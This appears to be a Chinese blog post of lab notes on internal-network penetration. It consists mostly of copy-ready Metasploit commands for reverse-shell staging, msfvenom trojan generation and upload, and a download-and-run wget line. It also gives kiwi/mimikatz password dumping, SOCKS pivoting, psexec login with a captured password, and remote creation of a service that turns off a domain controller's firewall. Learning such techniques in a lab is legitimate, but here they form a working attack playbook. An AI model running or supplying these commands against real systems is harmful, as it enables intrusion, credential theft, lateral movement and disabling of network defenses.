内网打靶知识点总结

2021-08-16  本文已影响0人  migrate_
msf内网主机存存活扫描
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.52.1-255
set threads 5
run
Metasploit 脚本Web传递攻击
use exploit/multi/script/web_delivery
show targets
set target 7   #Linux
show payloads
set payload 7  #linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
run
#复制去机器上运行
meterpreter添加路由
#meterpreter终端
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p
background
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp lport=5555 -f elf -o shell.elf  #生成木马
上传木马
sessions 1
upload /home/kali/shell.elf /tmp/shell.elf   #上传木马
background
监听木马上线
use exploit/multi/handler   
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
set lport 5555
run
目标不出网,从同网段的肉鸡上下载木马
#192.168.52.10终端(肉鸡开始web服务)
python3 -m http.server                           
#192.168.52.20终端(shell,下载木马上线msf)
wget http://192.168.52.10:8000/shell.elf;chmod +x shell.elf;./shell.elf 
内网读取hash

如果机器是x64系统(必须先注入x64的进程才能运行)

ps              #找到x64的进程pid
migrate 1614    #注入到64位的程序
load kiwi       #运行程序
kiwi_cmd privilege::debug   #提升权限
kiwi_cmd sekurlsa::logonPasswords  # 读取密码
-------------------------------------------------
meterpreter > creds_tspkg
meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
注:自动迁移进程命令:run post/windows/manage/migrate
输入getpid查看当前PID,发现变为1416
进程迁移完后,原先PID为236的进行会自动关闭,如未关闭可以输入kill 236 杀掉进程
msf开启代理
use auxiliary/server/socks_proxy
set SRVHOST  0.0.0.0
set SRVPORT  1080
run
代理运用
proxychains rdesktop 192.168.93.20
管理多个jobs
help
jobs
kill 6
内网打ms17_010(设置好正向或者反向payload是关键)
先用MSF生成dll文件
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll
将x64.dll放到工具目录替换原来的,MSF设置好监听
psexec登陆(假如抓到了密码)如果不成功可能是防火墙的原因
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run
控制第二层网络的Windows 7远程关闭域控的防火墙

控制第二层网络的Windows 7与域控建立ipc连接

meterpreter>shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"

使用sc远程在域制器(192.168.93.30)上创建服务关闭防火墙

sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

再次尝试执行 exploit/windows/smb/psexec 模块登录

msf和cs联动

metasploit与Cobaltstrike互相派生shell

代理搭建(一)

1.png 2.png

代理就使用浏览器的sock4代理,ip就是服务端的,端口是是我们刚刚自定义的

代理搭建(二)

3.png

把代码复制到metasploit控制台中,将metasploit中的流量引入到此socks代理

4.png
listen中继

在现有机器上使用中转

5.png 6.png

生成木马

7.png
上一篇 下一篇

猜你喜欢

热点阅读